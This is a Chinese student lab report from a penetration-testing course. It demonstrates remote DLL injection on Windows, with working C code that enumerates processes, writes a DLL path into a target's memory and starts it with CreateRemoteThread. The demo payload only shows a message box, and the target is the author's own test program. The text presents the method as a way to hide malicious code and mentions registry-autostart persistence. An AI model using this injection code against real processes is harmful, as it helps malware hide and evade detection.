20145319 《网络渗透》免考—远程注入
20145319 《网络渗透》免考—远程注入
概述
- 本次实验在window环境下进行,通过将自己编写的dll文件以远程线程的方式注入到宿主程序的虚拟地址空间中完成注入
- 主要知识如下
- 动静态库相关知识(语法以及制作)
- 进程,线程相关概念
- 系统快照,进程枚举等相关知识(windows api函数)
实验内容
概述
- 当我们运行一个应用程序时,就会在系统中创建一个进程,可以说进程就是一个程序的执行实例。而线程是操作系统能够进行运算调度的最小单位,被包含在进程中,是进程的实际运作单位。
- 正常状况下,每个进程被创建时,系统都会分配给其相应的一块虚拟地址空间,将可执行文件或者dll文件的代码加载到该进程空间中执行,理论上,这个虚拟地址空间相当于该进程的“私人空间”,但是
CreateRemoteThread函数
,通过这个API函数则可以为一个进程新增一个线程,我们就可以通过这个方法来将自身的恶意代码包装成一个线程,来加载到进程的虚拟空间空间中执行,并且共享宿主进程的空间资源,同样,因为我们的恶意代码是作为一个线程“寄生”在宿主进程中的,所以在任务管理器上也无法显示出来,一定程度上也实现了隐藏
步骤
-
首先将我们的恶意代码写成一个dll文件,dll文件编写可以参考静态库和动态库的制作
-
编写一个简单dll,当加载成功时弹窗提示
#include "windows.h" BOOL APIENTRY DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { switch (fdwReason){ case DLL_PROCESS_ATTACH: //dll被加载时,弹出提示 MessageBox(NULL, TEXT("hello,5319"), TEXT("提示"), MB_OK); break; case DLL_PROCESS_DETACH: //dll被清除时,弹出提示 MessageBox(NULL, TEXT("goodbye,5319"), TEXT("提示"), MB_OK); break; } return true; }
-
写好了我们的“病毒”程序,我们就需要寻找我们的目标作为宿主(这里我选择了一个自己编写的窗口小程序hello5319.exe)通过系统函数获取其Pid以便进行下一步操作
DWORD getPID() { PROCESSENTRY32 pe32; pe32.dwSize = sizeof(pe32); HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (hProcessSnap == INVALID_HANDLE_VALUE) { return false; } BOOL bMore = Process32First(hProcessSnap, &pe32); while (bMore) { if (!stricmp(pe32.szExeFile, "hello5319.exe")){ //获取该进程的句柄 HANDLE handle = OpenProcess(PROCESS_ALL_ACCESS,false, pe32.th32ProcessID); if (handle == NULL) { exit(0); } CloseHandle(hProcessSnap); CloseHandle(handle); break; } else bMore = Process32Next(hProcessSnap, &pe32); } return pe32.th32ProcessID; //返回此进程ID }
-
之后就在进程中分配相应空间,创建新线程,使用函数loadlibrary完成dll加载,函数实现如下
BOOL InjectDll(const char *DllFullPath, const DWORD dwRemoteProcessId) { HANDLE hProcess; hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwRemoteProcessId); char *pszdll; pszdll = (char *)VirtualAllocEx(hProcess, NULL, lstrlen(DllFullPath) + 1,MEM_COMMIT, PAGE_READWRITE); //在远程进程的内存地址空间分配DLL文件名空间 WriteProcessMemory(hProcess,pszdll, (void *)DllFullPath, lstrlen(DllFullPath) + 1, NULL);//将DLL的路径名写入到远程进程的内存空间 DWORD dwID; LPVOID pFunc = LoadLibrary; HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pFunc,pszdll, 0, &dwID); CloseHandle(hProcess); CloseHandle(hThread); return TRUE; }
运行结果
-
首先运行我们的宿主程序hello5319.exe,然后运行我们的注入程序,就可以看到结果
-
当我们关闭宿主程序时,则弹出提示goodbye,5319
-
以上我们的远程注入就算是成功了,但是要想进一步完善则需要运用到更多技术,例如,当宿主程序关闭时,dll文件即被清除,无法将其隐藏并保存下来,我们就需要运用资源节方面的技术,或是将修改注册表,将注入程序添加到自启动项,每次开机都完成一次注入,不过那只能等到下一次再一一介绍了
posted on 2017-06-18 12:35 20145319钟轲 阅读(223) 评论(0) 编辑 收藏 举报